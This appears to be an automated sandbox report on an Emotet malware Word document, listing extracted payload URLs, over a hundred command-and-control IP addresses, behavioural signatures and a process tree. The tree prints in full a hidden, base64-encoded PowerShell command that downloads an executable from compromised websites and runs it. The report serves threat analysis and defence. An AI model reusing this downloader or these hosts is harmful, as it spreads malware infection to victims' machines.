Analysis
-
max time kernel
141s -
resource
win10v191014 -
submitted
21/12/2019, 21:56
Task
task1
Sample
Docs_93eed51374a6f51f6b83fa343b69c5d3.2.doc
Resource
win7v191014
General
Malware Config
Extracted
http://diwafashions.com/wp-admin/mqau6/
http://designers.hotcom-web.com/ubkskw29clek/qnpm1p/
http://dixartcontractors.com/cgi-bin/nnuv/
http://diaspotv.info/wordpress/G/
http://easyvisaoverseas.com/cgi-bin/v/
Extracted
emotet
24.181.125.62:80
98.156.206.153:80
173.21.26.90:80
108.61.99.179:8080
165.227.156.155:443
159.69.89.130:8080
167.99.105.223:7080
5.196.74.210:8080
200.7.243.108:443
183.102.238.69:465
64.147.15.138:80
85.152.174.56:80
59.148.227.190:80
62.75.187.192:8080
174.77.190.137:8080
87.106.139.101:8080
173.247.19.238:80
2.38.99.79:80
178.210.51.222:8080
209.141.54.221:8080
91.242.138.5:443
190.147.215.53:22
186.67.208.78:8080
107.170.24.125:8080
81.0.63.86:8080
100.14.117.137:80
190.220.19.82:443
76.164.99.46:80
190.189.224.117:443
110.143.57.109:80
47.156.70.145:80
206.189.112.148:8080
217.160.182.191:8080
47.149.28.234:80
2.237.76.249:80
45.51.40.140:80
128.65.154.183:443
138.59.177.106:443
78.24.219.147:8080
87.230.19.21:8080
200.114.167.85:80
149.202.153.252:8080
82.27.181.93:80
173.91.11.142:80
66.25.34.20:80
190.162.159.212:80
176.106.183.253:8080
139.130.241.252:443
46.105.131.87:80
73.11.153.178:8080
210.6.85.121:80
178.237.139.83:8080
184.167.148.162:80
120.150.246.241:80
108.20.69.44:80
201.184.105.242:443
138.122.5.214:8080
182.176.132.213:8090
85.72.180.68:80
219.78.255.48:80
176.31.200.130:8080
45.33.49.124:443
174.81.132.128:80
201.251.133.92:443
104.131.11.150:8080
12.176.19.218:80
82.155.161.203:80
62.138.26.28:8080
169.239.182.217:8080
167.71.10.37:8080
47.6.15.79:443
85.67.10.190:80
192.241.255.77:8080
5.88.182.250:80
61.197.110.214:80
95.128.43.213:8080
31.172.240.91:8080
66.209.97.122:8080
188.152.7.140:80
159.65.25.128:8080
59.103.164.174:80
24.94.237.248:80
190.12.119.180:443
101.187.247.29:80
104.236.246.93:8080
5.154.58.24:80
93.147.141.5:80
31.31.77.83:443
31.177.54.196:443
75.80.148.244:80
116.48.142.21:443
186.75.241.230:80
86.98.156.239:443
120.151.135.224:80
165.228.24.197:80
206.81.10.215:8080
73.214.99.25:80
212.129.24.79:8080
104.131.44.150:8080
144.139.247.220:80
24.93.212.32:80
91.205.215.66:443
47.6.15.79:80
68.118.26.116:80
24.105.202.216:443
108.179.206.219:8080
37.59.24.177:8080
209.97.168.52:8080
91.73.197.90:80
92.222.216.44:8080
50.116.86.205:8080
218.44.21.114:80
103.86.49.11:8080
110.142.38.16:80
104.137.176.186:80
179.13.185.19:80
195.244.215.206:80
67.225.179.64:8080
178.209.71.63:8080
37.157.194.134:443
73.176.241.255:80
80.21.182.46:80
201.173.217.124:443
211.63.71.72:8080
46.216.60.138:80
1.33.230.137:80
87.106.136.232:8080
Signatures
-
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 4956 WINWORD.EXE 4732 882.exe 4384 882.exe 3960 monthlytitle.exe 4244 monthlytitle.exe -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3184 988 Powershell.exe 74 -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 3184 wrote to memory of 4732 3184 Powershell.exe 80 PID 4732 wrote to memory of 4384 4732 882.exe 81 PID 3960 wrote to memory of 4244 3960 monthlytitle.exe 83 -
Suspicious behavior: EmotetMutantsSpam 2 IoCs
pid Process 4384 882.exe 4244 monthlytitle.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File renamed C:\Users\Admin\882.exe => C:\Windows\SysWOW64\monthlytitle.exe 882.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat monthlytitle.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 monthlytitle.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE monthlytitle.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies monthlytitle.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 monthlytitle.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4956 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4956 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3184 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3184 Powershell.exe 4244 monthlytitle.exe -
Executes dropped EXE 4 IoCs
pid Process 4732 882.exe 4384 882.exe 3960 monthlytitle.exe 4244 monthlytitle.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_93eed51374a6f51f6b83fa343b69c5d3.2.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:4956
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABWAGgAZAByAGkAZwBwAHQAeQA9ACcARwByAG4AcgBsAHYAagBnAHEAdwBpAGUAbAAnADsAJABRAGgAeQBtAGQAZAB0AHAAdQAgAD0AIAAnADgAOAAyACcAOwAkAFEAeQBmAHIAZgBhAHgAcABzAHAAeQA9ACcAQgBuAGIAbwByAGEAZwB6AGwAcgAnADsAJABLAGEAdABxAGgAcwByAGcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFEAaAB5AG0AZABkAHQAcAB1ACsAJwAuAGUAeABlACcAOwAkAE8AYQBqAG4AZAByAHUAbAByAD0AJwBTAHoAdABnAHUAeAB6AHcAdwBrAHUAbwAnADsAJABGAHUAegBqAGQAcwBnAHYAZQA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAFQALgBXAGUAYgBDAGwAaQBFAE4AVAA7ACQAVgB4AHkAegB5AHYAeQBzAGYAbQA9ACcAaAB0AHQAcAA6AC8ALwBkAGkAdwBhAGYAYQBzAGgAaQBvAG4AcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbQBxAGEAdQA2AC8AKgBoAHQAdABwADoALwAvAGQAZQBzAGkAZwBuAGUAcgBzAC4AaABvAHQAYwBvAG0ALQB3AGUAYgAuAGMAbwBtAC8AdQBiAGsAcwBrAHcAMgA5AGMAbABlAGsALwBxAG4AcABtADEAcAAvACoAaAB0AHQAcAA6AC8ALwBkAGkAeABhAHIAdABjAG8AbgB0AHIAYQBjAHQAbwByAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBuAG4AdQB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBhAHMAcABvAHQAdgAuAGkAbgBmAG8ALwB3AG8AcgBkAHAAcgBlAHMAcwAvAEcALwAqAGgAdAB0AHAAOgAvAC8AZQBhAHMAeQB2AGkAcwBhAG8AdgBlAHIAcwBlAGEAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHYALwAnAC4AIgBzAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAUAB1AHcAcQBvAGYAZwBoAGwAPQAnAE4AYgBwAHgAZABuAHUAZAAnADsAZgBvAHIAZQBhAGMAaAAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAgAGkAbgAgACQAVgB4AHkAegB5AHYAeQBzAGYAbQApAHsAdAByAHkAewAkAEYAdQB6AGoAZABzAGcAdgBlAC4AIgBkAG8AdwBOAEwAbwBhAGQAYABGAGAASQBsAGUAIgAoACQASABkAGkAawBjAGUAdgBiAHUAYwB6AGgAYQAsACAAJABLAGEAdABxAGgAcwByAGcAKQA7ACQAUAB5AHUAbQBiAG0AdgBiAHYAdAA9ACcASABuAHgAeQB2AGMAcwBuACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQASwBhAHQAcQBoAHMAcgBnACkALgAiAGwAZQBuAGAAZwBUAGgAIgAgAC0AZwBlACAAMgA4ADQAMQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABhAGAAUgBUACIAKAAkAEsAYQB0AHEAaABzAHIAZwApADsAJABHAGcAdwBqAHkAcwB4AHoAPQAnAFgAYQB2AGMAZABtAHMAbABnAHAAeAAnADsAYgByAGUAYQBrADsAJABVAGIAYQBmAHIAcwBrAGYAeQBiAD0AJwBHAGYAYwB4AGkAeQB1AGEAbQBqAG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUgBwAGEAYwBlAHgAZQByAHUAYgBpAHgAbgA9ACcAQQBrAHoAeQB5AG8AeABoAHAAJwA=1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:3184 -
C:\Users\Admin\882.exe"C:\Users\Admin\882.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:4732 -
C:\Users\Admin\882.exe--2f98b903⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Executes dropped EXE
PID:4384
-
-
-
C:\Windows\SysWOW64\monthlytitle.exe"C:\Windows\SysWOW64\monthlytitle.exe"1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
PID:3960 -
C:\Windows\SysWOW64\monthlytitle.exe--d21c35dd2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: EmotetMutantsSpam
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Executes dropped EXE
PID:4244
-